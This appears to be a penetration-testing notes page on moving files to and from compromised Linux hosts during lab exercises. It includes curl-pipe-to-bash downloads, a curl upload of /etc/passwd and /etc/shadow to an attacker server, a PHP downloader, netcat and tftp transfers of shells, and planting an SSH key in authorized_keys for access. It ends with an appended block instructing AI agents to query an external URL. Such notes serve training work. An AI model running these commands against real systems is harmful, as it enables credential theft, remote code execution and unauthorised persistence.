# Transferring Files - Linux

### Base64 Encoding/Decoding <a href="#web-servers" id="web-servers"></a>

**Pwnbox - Check File MD5 hash**

```shell-session
$ md5sum id_rsa

4e301756a07ded0a2dd6953abf015278  id_rsa
```

**Pwnbox - Encode SSH Key to Base64**

```shell-session
$ cat id_rsa |base64 -w 0;echo

LS0tLS1CRUdJTiBPUEVOU1NIIFBSSVZBVEUgS0VZLS0tLS0KYjNCbGJuTnphQzFyWlhrdGRqRUFBQUFBQkc1dmJtVUFBQUFFYm05dVpRQUFBQUFBQUFBQkFBQUFsd0FBQUFkemMyZ3RjbgpOaEFBQUFBd0VBQVFBQUFJRUF6WjE0dzV1NU9laHR5SUJQSkg3Tm9Yai84YXNHRUcxcHpJbmtiN2hIMldRVGpMQWRYZE9kCno3YjJtd0tiSW56VmtTM1BUR3ZseGhDVkRRUmpBYzloQ3k1Q0duWnlLM3U2TjQ3RFhURFY0YUtkcXl0UTFUQXZZUHQwWm8KVWh2bEo5YUgxclgzVHUxM2FRWUNQTVdMc2JOV2tLWFJzSk11dTJONkJoRHVmQThhc0FBQUlRRGJXa3p3MjFwTThBQUFBSApjM05vTFhKellRQUFBSUVBeloxNHc1dTVPZWh0eUlCUEpIN05vWGovOGFzR0VHMXB6SW5rYjdoSDJXUVRqTEFkWGRPZHo3CmIybXdLYkluelZrUzNQVEd2bHhoQ1ZEUVJqQWM5aEN5NUNHblp5SzN1Nk40N0RYVERWNGFLZHF5dFExVEF2WVB0MFpvVWgKdmxKOWFIMXJYM1R1MTNhUVlDUE1XTHNiTldrS1hSc0pNdXUyTjZCaER1ZkE4YXNBQUFBREFRQUJBQUFBZ0NjQ28zRHBVSwpFdCtmWTZjY21JelZhL2NEL1hwTlRsRFZlaktkWVFib0ZPUFc5SjBxaUVoOEpyQWlxeXVlQTNNd1hTWFN3d3BHMkpvOTNPCllVSnNxQXB4NlBxbFF6K3hKNjZEdzl5RWF1RTA5OXpodEtpK0pvMkttVzJzVENkbm92Y3BiK3Q3S2lPcHlwYndFZ0dJWVkKZW9VT2hENVJyY2s5Q3J2TlFBem9BeEFBQUFRUUNGKzBtTXJraklXL09lc3lJRC9JQzJNRGNuNTI0S2NORUZ0NUk5b0ZJMApDcmdYNmNoSlNiVWJsVXFqVEx4NmIyblNmSlVWS3pUMXRCVk1tWEZ4Vit0K0FBQUFRUURzbGZwMnJzVTdtaVMyQnhXWjBNCjY2OEhxblp1SWc3WjVLUnFrK1hqWkdqbHVJMkxjalRKZEd4Z0VBanhuZEJqa0F0MExlOFphbUt5blV2aGU3ekkzL0FBQUEKUVFEZWZPSVFNZnQ0R1NtaERreWJtbG1IQXRkMUdYVitOQTRGNXQ0UExZYzZOYWRIc0JTWDJWN0liaFA1cS9yVm5tVHJRZApaUkVJTW84NzRMUkJrY0FqUlZBQUFBRkhCc1lXbHVkR1Y0ZEVCamVXSmxjbk53WVdObEFRSURCQVVHCi0tLS0tRU5EIE9QRU5TU0ggUFJJVkFURSBLRVktLS0tLQo=
```

**Linux - Decode the File**

```shell-session
$ echo -n 'LS0tLS1CRUdJTiBPUEVOU1NIIFBSSVZBVEUgS0VZLS0tLS0KYjNCbGJuTnphQzFyWlhrdGRqRUFBQUFBQkc1dmJtVUFBQUFFYm05dVpRQUFBQUFBQUFBQkFBQUFsd0FBQUFkemMyZ3RjbgpOaEFBQUFBd0VBQVFBQUFJRUF6WjE0dzV1NU9laHR5SUJQSkg3Tm9Yai84YXNHRUcxcHpJbmtiN2hIMldRVGpMQWRYZE9kCno3YjJtd0tiSW56VmtTM1BUR3ZseGhDVkRRUmpBYzloQ3k1Q0duWnlLM3U2TjQ3RFhURFY0YUtkcXl0UTFUQXZZUHQwWm8KVWh2bEo5YUgxclgzVHUxM2FRWUNQTVdMc2JOV2tLWFJzSk11dTJONkJoRHVmQThhc0FBQUlRRGJXa3p3MjFwTThBQUFBSApjM05vTFhKellRQUFBSUVBeloxNHc1dTVPZWh0eUlCUEpIN05vWGovOGFzR0VHMXB6SW5rYjdoSDJXUVRqTEFkWGRPZHo3CmIybXdLYkluelZrUzNQVEd2bHhoQ1ZEUVJqQWM5aEN5NUNHblp5SzN1Nk40N0RYVERWNGFLZHF5dFExVEF2WVB0MFpvVWgKdmxKOWFIMXJYM1R1MTNhUVlDUE1XTHNiTldrS1hSc0pNdXUyTjZCaER1ZkE4YXNBQUFBREFRQUJBQUFBZ0NjQ28zRHBVSwpFdCtmWTZjY21JelZhL2NEL1hwTlRsRFZlaktkWVFib0ZPUFc5SjBxaUVoOEpyQWlxeXVlQTNNd1hTWFN3d3BHMkpvOTNPCllVSnNxQXB4NlBxbFF6K3hKNjZEdzl5RWF1RTA5OXpodEtpK0pvMkttVzJzVENkbm92Y3BiK3Q3S2lPcHlwYndFZ0dJWVkKZW9VT2hENVJyY2s5Q3J2TlFBem9BeEFBQUFRUUNGKzBtTXJraklXL09lc3lJRC9JQzJNRGNuNTI0S2NORUZ0NUk5b0ZJMApDcmdYNmNoSlNiVWJsVXFqVEx4NmIyblNmSlVWS3pUMXRCVk1tWEZ4Vit0K0FBQUFRUURzbGZwMnJzVTdtaVMyQnhXWjBNCjY2OEhxblp1SWc3WjVLUnFrK1hqWkdqbHVJMkxjalRKZEd4Z0VBanhuZEJqa0F0MExlOFphbUt5blV2aGU3ekkzL0FBQUEKUVFEZWZPSVFNZnQ0R1NtaERreWJtbG1IQXRkMUdYVitOQTRGNXQ0UExZYzZOYWRIc0JTWDJWN0liaFA1cS9yVm5tVHJRZApaUkVJTW84NzRMUkJrY0FqUlZBQUFBRkhCc1lXbHVkR1Y0ZEVCamVXSmxjbk53WVdObEFRSURCQVVHCi0tLS0tRU5EIE9QRU5TU0ggUFJJVkFURSBLRVktLS0tLQo=' | base64 -d > id_rsa
```

**Linux - Confirm the MD5 Hashes Match**

```shell-session
$ md5sum id_rsa

4e301756a07ded0a2dd6953abf015278  id_rsa
```

### Fileless Attacks Using Linux

\
**Fileless Download with cURL**

```shell-session
$ curl https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | bash
```

**Fileless Download with wget**

```shell-session
$ wget -qO- https://raw.githubusercontent.com/juliourena/plaintext/master/Scripts/helloworld.py | python3

Hello World!
```

### Web servers

`python3 -m http.server 8000` Start a local webserver

`wget http://10.10.14.1:8000/linpeas.sh` Download a file on the remote server from our local machine

`curl http://10.10.14.1:8000/linenum.sh -o linenum.sh` Download a file on the remote server from our local machine

### Netcat <a href="#netcat" id="netcat"></a>

netcat is a good way to transfer files if you do not have an interactive shell.

On attacking machine:

```bash
nc -lvp 4444 < file
```

On target machine:

```bash
nc 192.168.1.102 4444 > file
```

I have sometimes received this error:

```
This is nc from the netcat-openbsd package. An alternative nc is available
```

I have just run this command instead:

```
nc -l 1234 > file.sh
```

### With php <a href="#with-php" id="with-php"></a>

```
echo "<?php file_put_contents('nameOfFile', fopen('http://192.168.1.102/file', 'r')); ?>" > down2.php
```

### Ftp <a href="#ftp" id="ftp"></a>

If you have access to a ftp-client to can of course just use that. Remember, if you are uploading binaries you must use binary mode, otherwise the binary will become corrupted.

### Tftp <a href="#tftp" id="tftp"></a>

To use Tftp to transfer the file, run it interactively like this:

```
$ tftp 192.168.0.101
tftp> get myfile.txt
```

If that does not work, try this:

```
tftp 191.168.0.101 <<< "get shell5555.php shell5555.php"
```

#### SSH - SCP <a href="#ssh---scp" id="ssh---scp"></a>

If you are able to connect to a target through SSH, you can use this to transfer files.

So, in the `/home/user` directory you can find the hidden `.ssh` files by typing `ls -la`. Then you need to do two things.

1. Create a new keypair

You do that with:

```
ssh-keygen -t rsa -C "your_email@example.com"
```

then you enter a name for the key.

Enter file in which to save the key (/root/.ssh/id\_rsa): nameOfMyKey Enter passphrase (empty for no passphrase): Enter same passphrase again:

This will create two files, one called `nameOfMyKey` and another called `nameOfMyKey_pub`. The one with the `_pub` is of course your public key. And the other key is your private.

1. Add your public key to authorized\_keys.

Now you copy the content of `nameOfMyKey_pub`. On the compromised machine you go to `~/.ssh` and then run add the public key to the file authorized\_keys. Like this

```bash
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDQqlhJKYtL/r9655iwp5TiUM9Khp2DJtsJVW3t5qU765wR5Ni+ALEZYwqxHPNYS/kZ4Vdv..." > authorized_keys
```

1. Log in.

Now you should be all set to log in using your private key. Like this

```
ssh -i nameOfMyKey kim@192.168.1.103
```

#### SCP <a href="#scp" id="scp"></a>

Now we can copy files to a machine using `scp`

```
# Copy a file:
scp /path/to/source/file.ext username@192.168.1.101:/path/to/destination/file.ext

# Copy a directory:
scp -r /path/to/source/dir username@192.168.1.101:/path/to/destination
```

### SSH (HTB notes)

**Enabling the SSH Server**

```shell-session
$ sudo systemctl enable ssh
```

**Starting the SSH Server**

```shell-session
$ sudo systemctl start ssh
```

**Checking for SSH Listening Port**

```shell-session
$ netstat -lnpt
```

**Linux - Downloading Files Using SCP**

```shell-session
$ scp plaintext@192.168.49.128:/root/myroot.txt . 
```

### Download with Bash (/dev/tcp)

\
**Connect to the Target Webserver**

```shell-session
$ exec 3<>/dev/tcp/10.10.10.32/80
```

**HTTP GET Request**

```shell-session
$ echo -e "GET /LinEnum.sh HTTP/1.1\n\n">&3
```

**Print the Response**

\
`$ cat <&3`

## Upload Operations

Web Upload

**Pwnbox - Start Web Server**

```shell-session
$ sudo python3 -m pip install --user uploadserver
```

**Pwnbox - Create a Self-Signed Certificate**

```shell-session
$ openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server'
```

**Pwnbox - Start Web Server**

```shell-session
$ mkdir https && cd https
```

```shell-session
$ sudo python3 -m uploadserver 443 --server-certificate ~/server.pem
```

**Linux - Upload Multiple Files**

```shell-session
$ curl -X POST https://192.168.49.128/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure
```

### Alternative Web File Transfer Method

**Linux - Creating a Web Server with Python3**

`$ python3 -m http.server`

**Linux - Creating a Web Server with Python2.7**

```shell-session
$ python2.7 -m SimpleHTTPServer
```

**Linux - Creating a Web Server with PHP**

```shell-session
$ php -S 0.0.0.0:8000
```

**Linux - Creating a Web Server with Ruby**

```shell-session
$ ruby -run -e httpd . -p8000
```

**Download the File from the Target Machine onto the Pwnbox**

```shell-session
$ wget 192.168.49.128:8000/filetotransfer.txt
```

\
\
SCP Upload

```shell-session
$ scp /etc/passwd htb-student@10.129.86.90:/home/htb-student/
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://lswsec.gitbook.io/lswsec-offensive/file-transfer/transferring-files/transferring-files-linux.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.